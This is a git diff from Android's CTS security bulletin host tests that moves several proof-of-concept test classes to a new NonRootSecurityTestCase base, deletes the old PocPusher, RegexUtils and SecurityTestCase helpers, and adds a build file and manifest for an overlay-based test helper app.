index 71cb84d8824..791b8b456d0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc19_07 extends SecurityTestCase {
+public class Poc19_07 extends NonRootSecurityTestCase {
/**
* Bug-137878930
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_01.java
index 5a8f4d78a68..b029aa6953d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_01.java
@@ -1,14 +1,17 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc20_01 extends SecurityTestCase {
+public class Poc20_01 extends NonRootSecurityTestCase {
/**
* CVE-2019-14002
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_03.java
index 5b9bb220c0e..72e7b960509 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_03.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc20_03 extends SecurityTestCase {
+public class Poc20_03 extends NonRootSecurityTestCase {
/**
* b/147882143
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_06.java
index 6ed83c1ac32..3f2d1d0d798 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_06.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_06.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc20_06 extends SecurityTestCase {
+public class Poc20_06 extends NonRootSecurityTestCase {
/**
* CVE-2020-3635
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_11.java
index bd2a761e2fb..89b83fc0506 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc20_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc20_11.java
@@ -16,16 +16,19 @@
package android.security.cts;
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
-import static org.junit.Assume.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc20_11 extends SecurityTestCase {
+public class Poc20_11 extends NonRootSecurityTestCase {
/**
* b/162741784
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java
index e55570052cb..6aa885336f4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java
@@ -16,16 +16,19 @@
package android.security.cts;
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
-import static org.junit.Assume.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc21_01 extends SecurityTestCase {
+public class Poc21_01 extends NonRootSecurityTestCase {
/**
* b/168211968
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
deleted file mode 100644
index 07f45db0d4e..00000000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
+++ /dev/null
@@ -1,143 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-
-import org.junit.runner.Description;
-import org.junit.runners.model.Statement;
-
-import java.util.HashSet;
-import java.util.Iterator;
-import java.util.Set;
-import java.io.File;
-import java.io.FileNotFoundException;
-
-import org.junit.runner.Description;
-import org.junit.rules.TestWatcher;
-
-import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
-import com.android.tradefed.build.IBuildInfo;
-import com.android.tradefed.device.DeviceNotAvailableException;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.log.LogUtil.CLog;
-import com.android.tradefed.testtype.IAbi;
-
-import static org.junit.Assume.*;
-import static org.junit.Assert.*;
-
-public class PocPusher extends TestWatcher {
- private ITestDevice device = null;
- private CompatibilityBuildHelper buildHelper = null;
- private IAbi abi = null;
-
- private Set<String> filesToCleanup = new HashSet();
- public boolean bitness32 = true;
- public boolean bitness64 = true;
- public boolean appendBitness = true;
- public boolean cleanup = true;
-
- @Override
- protected void starting(Description d) {
- bothBitness();
- appendBitness = true;
- cleanup = true;
- }
-
- @Override
- protected void finished(Description d) {
- for (Iterator<String> it = filesToCleanup.iterator(); it.hasNext();) {
- String file = it.next();
- try {
- CLog.i("Cleaning up %s", file);
- device.deleteFile(file);
- } catch (DeviceNotAvailableException e) {
- CLog.e("Device unavailable when cleaning up %s", file);
- continue; // try to remove next time
- }
- it.remove();
- }
- }
-
- public PocPusher setDevice(ITestDevice device) {
- this.device = device;
- return this;
- }
-
- public PocPusher setAbi(IAbi abi) {
- this.abi = abi;
- return this;
- }
-
- public PocPusher setBuild(IBuildInfo buildInfo) {
- buildHelper = new CompatibilityBuildHelper(buildInfo);
- return this;
- }
-
- public PocPusher appendBitness(boolean append) {
- this.appendBitness = append;
- return this;
- }
-
- public PocPusher cleanup(boolean cleanup) {
- this.cleanup = cleanup;
- return this;
- }
-
- public PocPusher only32() {
- bitness32 = true;
- bitness64 = false;
- return this;
- }
-
- public PocPusher only64() {
- bitness32 = false;
- bitness64 = true;
- return this;
- }
-
- public PocPusher bothBitness() {
- bitness32 = true;
- bitness64 = true;
- return this;
- }
-
- public void pushFile(String testFile, String remoteFile)
- throws FileNotFoundException, DeviceNotAvailableException {
- if (appendBitness) {
- // if neither 32 or 64, nothing would ever be pushed.
- assertTrue("bitness must be 32, 64, or both.", bitness32 || bitness64);
-
- String bitness = SecurityTestCase.getAbi(device).getBitness().trim();
-
- // 32-bit doesn't have a 64-bit compatibility layer; skipping.
- assumeFalse(bitness.equals("32") && !bitness32);
-
- // push the 32-bit file on 64-bit device if a 64-bit file doesn't exist.
- if (bitness.equals("64") && !bitness64) {
- bitness = "32";
- CLog.i("Pushing a 32-bit file onto a 64-bit device.");
- }
- testFile += bitness;
- }
- CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile);
- File localFile = buildHelper.getTestFile(testFile);
- device.pushFile(localFile, remoteFile);
- if (cleanup) {
- filesToCleanup.add(remoteFile);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java
deleted file mode 100644
index 9ce7e39f35f..00000000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java
+++ /dev/null
@@ -1,143 +0,0 @@
-/*
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import java.util.concurrent.TimeoutException;
-import java.util.regex.Pattern;
-import java.util.regex.Matcher;
-import com.android.ddmlib.Log.LogLevel;
-import com.android.tradefed.log.LogUtil.CLog;
-
-import static org.junit.Assert.*;
-
-public class RegexUtils {
- private static final int TIMEOUT_DURATION = 20 * 60_000; // 20 minutes
- private static final int WARNING_THRESHOLD = 1000; // 1 second
- private static final int CONTEXT_RANGE = 100; // chars before/after matched input string
-
- public static void assertContains(String pattern, String input) throws Exception {
- assertFind(pattern, input, false, false);
- }
-
- public static void assertContainsMultiline(String pattern, String input) throws Exception {
- assertFind(pattern, input, false, true);
- }
-
- public static void assertNotContains(String pattern, String input) throws Exception {
- assertFind(pattern, input, true, false);
- }
-
- public static void assertNotContainsMultiline(String pattern, String input) throws Exception {
- assertFind(pattern, input, true, true);
- }
-
- private static void assertFind(
- String pattern, String input, boolean shouldFind, boolean multiline) {
- // The input string throws an error when used after the timeout
- TimeoutCharSequence timedInput = new TimeoutCharSequence(input, TIMEOUT_DURATION);
- Matcher matcher = null;
- if (multiline) {
- // DOTALL lets .* match line separators
- // MULTILINE lets ^ and $ match line separators instead of input start and end
- matcher = Pattern.compile(
- pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(timedInput);
- } else {
- matcher = Pattern.compile(pattern).matcher(timedInput);
- }
-
- try {
- long start = System.currentTimeMillis();
- boolean found = matcher.find();
- long duration = System.currentTimeMillis() - start;
-
- if (duration > WARNING_THRESHOLD) {
- // Provide a warning to the test developer that their regex should be optimized.
- CLog.logAndDisplay(LogLevel.WARN, "regex match took " + duration + "ms.");
- }
-
- if (found && shouldFind) { // failed notContains
- String substring = input.substring(matcher.start(), matcher.end());
- String context = getInputContext(input, matcher.start(), matcher.end(),
- CONTEXT_RANGE, CONTEXT_RANGE);
- fail("Pattern found: '" + pattern + "' -> '" + substring + "' for input:\n..." +
- context + "...");
- } else if (!found && !shouldFind) { // failed contains
- fail("Pattern not found: '" + pattern + "' for input:\n..." + input + "...");
- }
- } catch (TimeoutCharSequence.CharSequenceTimeoutException e) {
- // regex match has taken longer than the timeout
- // this usually means the input is extremely long or the regex is catastrophic
- fail("Regex timeout with pattern: '" + pattern + "' for input:\n..." + input + "...");
- }
- }
-
- /*
- * Helper method to grab the nearby chars for a subsequence. Similar to the -A and -B flags for
- * grep.
- */
- private static String getInputContext(String input, int start, int end, int before, int after) {
- start = Math.max(0, start - before);
- end = Math.min(input.length(), end + after);
- return input.substring(start, end);
- }
-
- /*
- * Wrapper for a given CharSequence. When charAt() is called, the current time is compared
- * against the timeout. If the current time is greater than the expiration time, an exception is
- * thrown. The expiration time is (time of object construction) + (timeout in milliseconds).
- */
- private static class TimeoutCharSequence implements CharSequence {
- long expireTime = 0;
- CharSequence chars = null;
-
- TimeoutCharSequence(CharSequence chars, long timeout) {
- this.chars = chars;
- expireTime = System.currentTimeMillis() + timeout;
- }
-
- @Override
- public char charAt(int index) {
- if (System.currentTimeMillis() > expireTime) {
- throw new CharSequenceTimeoutException(
- "TimeoutCharSequence was used after the expiration time.");
- }
- return chars.charAt(index);
- }
-
- @Override
- public int length() {
- return chars.length();
- }
-
- @Override
- public CharSequence subSequence(int start, int end) {
- return new TimeoutCharSequence(chars.subSequence(start, end),
- expireTime - System.currentTimeMillis());
- }
-
- @Override
- public String toString() {
- return chars.toString();
- }
-
- private static class CharSequenceTimeoutException extends RuntimeException {
- public CharSequenceTimeoutException(String message) {
- super(message);
- }
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
deleted file mode 100644
index d7a3afc7a6d..00000000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ /dev/null
@@ -1,367 +0,0 @@
-/*
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import com.android.compatibility.common.util.MetricsReportLog;
-import com.android.compatibility.common.util.ResultType;
-import com.android.compatibility.common.util.ResultUnit;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
-import com.android.tradefed.build.IBuildInfo;
-import com.android.tradefed.config.Option;
-import com.android.tradefed.testtype.IBuildReceiver;
-import com.android.tradefed.testtype.IAbi;
-import com.android.tradefed.testtype.IAbiReceiver;
-import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
-import com.android.tradefed.device.DeviceNotAvailableException;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.device.NativeDevice;
-import com.android.tradefed.log.LogUtil.CLog;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.ddmlib.Log;
-
-import org.junit.rules.TestName;
-import org.junit.Rule;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.runner.RunWith;
-
-import java.util.Map;
-import java.util.HashMap;
-import java.util.regex.Pattern;
-import java.util.regex.Matcher;
-import java.util.concurrent.Callable;
-import java.math.BigInteger;
-
-import static org.junit.Assert.*;
-import static org.junit.Assume.*;
-import static org.hamcrest.core.Is.is;
-
-public class SecurityTestCase extends StsExtraBusinessLogicHostTestBase {
-
- private static final String LOG_TAG = "SecurityTestCase";
- private static final int RADIX_HEX = 16;
-
- protected static final int TIMEOUT_DEFAULT = 60;
- // account for the poc timer of 5 minutes (+15 seconds for safety)
- protected static final int TIMEOUT_NONDETERMINISTIC = 315;
-
- private long kernelStartTime = -1;
-
- private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this);
-
- @Rule public TestName testName = new TestName();
- @Rule public PocPusher pocPusher = new PocPusher();
-
- private static Map<ITestDevice, IBuildInfo> sBuildInfo = new HashMap<>();
- private static Map<ITestDevice, IAbi> sAbi = new HashMap<>();
- private static Map<ITestDevice, String> sTestName = new HashMap<>();
- private static Map<ITestDevice, PocPusher> sPocPusher = new HashMap<>();
-
- @Option(name = "set-kptr_restrict",
- description = "If kptr_restrict should be set to 2 after every reboot")
- private boolean setKptr_restrict = false;
- private boolean ignoreKernelAddress = false;
-
- /**
- * Waits for device to be online, marks the most recent boottime of the device
- */
- @Before
- public void setUp() throws Exception {
- getDevice().waitForDeviceAvailable();
- getDevice().disableAdbRoot();
- updateKernelStartTime();
- // TODO:(badash@): Watch for other things to track.
- // Specifically time when app framework starts
-
- sBuildInfo.put(getDevice(), getBuild());
- sAbi.put(getDevice(), getAbi());
- sTestName.put(getDevice(), testName.getMethodName());
-
- pocPusher.setDevice(getDevice()).setBuild(getBuild()).setAbi(getAbi());
- sPocPusher.put(getDevice(), pocPusher);
-
- if (setKptr_restrict) {
- if (getDevice().enableAdbRoot()) {
- CLog.i("setting kptr_restrict to 2");
- getDevice().executeShellCommand("echo 2 > /proc/sys/kernel/kptr_restrict");
- getDevice().disableAdbRoot();
- } else {
- // not a rootable device
- ignoreKernelAddress = true;
- }
- }
- }
-
- /**
- * Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
- * (due to rounding) of the previous boottime to check if The phone has crashed.
- */
- @After
- public void tearDown() throws Exception {
- try {
- getDevice().waitForDeviceAvailable(90 * 1000);
- } catch (DeviceNotAvailableException e) {
- // Force a disconnection of all existing sessions to see if that unsticks adbd.
- getDevice().executeAdbCommand("reconnect");
- getDevice().waitForDeviceAvailable(30 * 1000);
- }
-
- if (kernelStartTime != -1) {
- // only fail when the kernel start time is valid
- long deviceTime = getDeviceUptime() + kernelStartTime;
- long hostTime = System.currentTimeMillis() / 1000;
- assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
- kernelStartTime = -1;
- }
-
- // TODO(badash@): add ability to catch runtime restart
- }
-
- public static IBuildInfo getBuildInfo(ITestDevice device) {
- return sBuildInfo.get(device);
- }
-
- public static IAbi getAbi(ITestDevice device) {
- return sAbi.get(device);
- }
-
- public static String getTestName(ITestDevice device) {
- return sTestName.get(device);
- }
-
- public static PocPusher getPocPusher(ITestDevice device) {
- return sPocPusher.get(device);
- }
-
- // TODO convert existing assertMatches*() to RegexUtils.assertMatches*()
- // b/123237827
- @Deprecated
- public void assertMatches(String pattern, String input) throws Exception {
- RegexUtils.assertContains(pattern, input);
- }
-
- @Deprecated
- public void assertMatchesMultiLine(String pattern, String input) throws Exception {
- RegexUtils.assertContainsMultiline(pattern, input);
- }
-
- @Deprecated
- public void assertNotMatches(String pattern, String input) throws Exception {
- RegexUtils.assertNotContains(pattern, input);
- }
-
- @Deprecated
- public void assertNotMatchesMultiLine(String pattern, String input) throws Exception {
- RegexUtils.assertNotContainsMultiline(pattern, input);
- }
-
- /**
- * Runs a provided function that collects a String to test against kernel pointer leaks.
- * The getPtrFunction function implementation must return a String that starts with the
- * pointer. i.e. "01234567". Trailing characters are allowed except for [0-9a-fA-F]. In
- * the event that the pointer appears to be vulnerable, a JUnit assert is thrown. Since kernel
- * pointers can be hashed, there is a possiblity the the hashed pointer overlaps into the
- * normal kernel space. The test re-runs to make false positives statistically insignificant.
- * When kernel pointers won't change without a reboot, provide a device to reboot.
- *
- * @param getPtrFunction a function that returns a string that starts with a pointer
- * @param deviceToReboot device to reboot when kernel pointers won't change
- */
- public void assertNotKernelPointer(Callable<String> getPtrFunction, ITestDevice deviceToReboot)
- throws Exception {
- assumeFalse("Cannot set kptr_restrict to 2, ignoring kptr test.", ignoreKernelAddress);
- String ptr = null;
- for (int i = 0; i < 4; i++) { // ~0.4% chance of false positive
- ptr = getPtrFunction.call();
- if (ptr == null) {
- return;
- }
- if (!isKptr(ptr)) {
- // quit early because the ptr is likely hashed or zeroed.
- return;
- }
- if (deviceToReboot != null) {
- deviceToReboot.nonBlockingReboot();
- deviceToReboot.waitForDeviceAvailable();
- updateKernelStartTime();
- }
- }
- fail("\"" + ptr + "\" is an exposed kernel pointer.");
- }
-
- private boolean isKptr(String ptr) {
- Matcher m = Pattern.compile("[0-9a-fA-F]*").matcher(ptr);
- if (!m.find() || m.start() != 0) {
- // ptr string is malformed
- return false;
- }
- int length = m.end();
-
- if (length == 8) {
- // 32-bit pointer
- BigInteger address = new BigInteger(ptr.substring(0, length), RADIX_HEX);
- // 32-bit kernel memory range: 0xC0000000 -> 0xffffffff
- // 0x3fffffff bytes = 1GB / 0xffffffff = 4 GB
- // 1 in 4 collision for hashed pointers
- return address.compareTo(new BigInteger("C0000000", RADIX_HEX)) >= 0;
- } else if (length == 16) {
- // 64-bit pointer
- BigInteger address = new BigInteger(ptr.substring(0, length), RADIX_HEX);
- // 64-bit kernel memory range: 0x8000000000000000 -> 0xffffffffffffffff
- // 48-bit implementation: 0xffff800000000000; 1 in 131,072 collision
- // 56-bit implementation: 0xff80000000000000; 1 in 512 collision
- // 64-bit implementation: 0x8000000000000000; 1 in 2 collision
- return address.compareTo(new BigInteger("ff80000000000000", RADIX_HEX)) >= 0;
- }
-
- return false;
- }
-
- /**
- * Check if a driver is present and readable.
- */
- protected boolean containsDriver(ITestDevice device, String driver) throws Exception {
- return containsDriver(device, driver, true);
- }
-
- /**
- * Check if a driver is present on a machine.
- */
- protected boolean containsDriver(ITestDevice device, String driver, boolean checkReadable)
- throws Exception {
- boolean containsDriver = false;
- if (driver.contains("*")) {
- // -A list all files but . and ..
- // -d directory, not contents
- // -1 list one file per line
- // -f unsorted
- String ls = "ls -A -d -1 -f " + driver;
- if (AdbUtils.runCommandGetExitCode(ls, device) == 0) {
- String[] expanded = device.executeShellCommand(ls).split("\\R");
- for (String expandedDriver : expanded) {
- containsDriver |= containsDriver(device, expandedDriver, checkReadable);
- }
- }
- } else {
- if(checkReadable) {
- containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
- } else {
- containsDriver = AdbUtils.runCommandGetExitCode("test -e " + driver, device) == 0;
- }
- }
-
- MetricsReportLog reportLog = buildMetricsReportLog(getDevice());
- reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE);
- reportLog.addValue("exists", containsDriver, ResultType.NEUTRAL, ResultUnit.NONE);
- reportLog.submit();
-
- return containsDriver;
- }
-
- protected static MetricsReportLog buildMetricsReportLog(ITestDevice device) {
- IBuildInfo buildInfo = getBuildInfo(device);
- IAbi abi = getAbi(device);
- String testName = getTestName(device);
-
- StackTraceElement[] stacktraces = Thread.currentThread().getStackTrace();
- int stackDepth = 2; // 0: getStackTrace(), 1: buildMetricsReportLog, 2: caller
- String className = stacktraces[stackDepth].getClassName();
- String methodName = stacktraces[stackDepth].getMethodName();
- String classMethodName = String.format("%s#%s", className, methodName);
-
- // The stream name must be snake_case or else json formatting breaks
- String streamName = methodName.replaceAll("(\\p{Upper})", "_$1").toLowerCase();
-
- MetricsReportLog reportLog = new MetricsReportLog(
- buildInfo,
- abi.getName(),
- classMethodName,
- "CtsSecurityBulletinHostTestCases",
- streamName,
- true);
- reportLog.addValue("test_name", testName, ResultType.NEUTRAL, ResultUnit.NONE);
- return reportLog;
- }
-
- private long getDeviceUptime() throws DeviceNotAvailableException {
- String uptime = null;
- int attempts = 5;
- do {
- if (attempts-- <= 0) {
- throw new RuntimeException("could not get device uptime");
- }
- getDevice().waitForDeviceAvailable();
- uptime = getDevice().executeShellCommand("cat /proc/uptime").trim();
- } while (uptime.isEmpty());
- return Long.parseLong(uptime.substring(0, uptime.indexOf('.')));
- }
-
- public void safeReboot() throws DeviceNotAvailableException {
- getDevice().nonBlockingReboot();
- getDevice().waitForDeviceAvailable();
- updateKernelStartTime();
- }
-
- /**
- * Allows a test to pass if called after a planned reboot.
- */
- public void updateKernelStartTime() throws DeviceNotAvailableException {
- long uptime = getDeviceUptime();
- kernelStartTime = (System.currentTimeMillis() / 1000) - uptime;
- }
-
- /**
- * Return true if a module is play managed.
- *
- * Example of skipping a test based on mainline modules:
- * <pre>
- * @Test
- * public void testPocCVE_1234_5678() throws Exception {
- * // This will skip the test if MODULE_METADATA mainline module is play managed.
- * assumeFalse(moduleIsPlayManaged("com.google.android.captiveportallogin"));
- * // Do testing...
- * }
- * * </pre>
- */
- boolean moduleIsPlayManaged(String modulePackageName) throws Exception {
- return mainlineModuleDetector.getPlayManagedModules().contains(modulePackageName);
- }
-
- public void assumeIsSupportedNfcDevice(ITestDevice device) throws Exception {
- String supportedDrivers[] = { "/dev/nq-nci*", "/dev/pn54*", "/dev/pn551*", "/dev/pn553*",
- "/dev/pn557*", "/dev/pn65*", "/dev/pn66*", "/dev/pn67*",
- "/dev/pn80*", "/dev/pn81*", "/dev/sn100*", "/dev/sn220*",
- "/dev/st54j*", "/dev/st21nfc*" };
- boolean isDriverFound = false;
- for(String supportedDriver : supportedDrivers) {
- if(containsDriver(device, supportedDriver, false)) {
- isDriverFound = true;
- break;
- }
- }
- String[] output = device.executeShellCommand("ls -la /dev | grep nfc").split("\\n");
- String nfcDevice = null;
- for (String line : output) {
- if(line.contains("nfc")) {
- String text[] = line.split("\\s+");
- nfcDevice = text[text.length - 1];
- }
- }
- assumeTrue("NFC device " + nfcDevice + " is not supported. Hence skipping the test",
- isDriverFound);
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index c4d37b0ecb5..60eae2b2bdc 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -16,27 +16,25 @@
package android.security.cts;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.log.LogUtil.CLog;
-import com.android.compatibility.common.util.CrashUtils;
+import static org.hamcrest.CoreMatchers.*;
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
-import static org.junit.Assume.*;
import junit.framework.Assert;
-import java.util.Arrays;
-import java.util.ArrayList;
-import static org.junit.Assume.*;
-import static org.hamcrest.CoreMatchers.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
-@RunWith(DeviceJUnit4ClassRunner.class)
-public class TestMedia extends SecurityTestCase {
+import java.util.Arrays;
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class TestMedia extends NonRootSecurityTestCase {
/******************************************************************************
* To prevent merge conflicts, add tests for N below this comment, before any
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/Android.bp b/hostsidetests/securitybulletin/test-apps/BUG-182810085/Android.bp
new file mode 100644
index 00000000000..d7af1caff97
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/Android.bp
@@ -0,0 +1,31 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+android_test_helper_app {
+ name: "BUG-182810085",
+ defaults: ["cts_support_defaults"],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.appcompat_appcompat",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-182810085/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/BUG-182810085/AndroidManifest.xml
new file mode 100644
index 00000000000..5777c1825ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/BUG-182810085/AndroidManifest.xml
@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.BUG_182810085"
+ minSdkVersion="29">
+
+ <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
+
+ <application android:theme="@style/Theme.AppCompat.Light">
+ <uses-library android:name="android.test.runner" />
+ <service android:name=".OverlayService"
+ android:enabled="true"
+ android:exported="false" />
+
+ <activity
+ android:name=".MainActivity"
+ android:label="ST (Permission)"
+ android:exported="true"
+ android:taskAffinity="android.security.cts.BUG_182810085.MainActivity">
+
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.BUG_182810085" />
+
+</manifest>
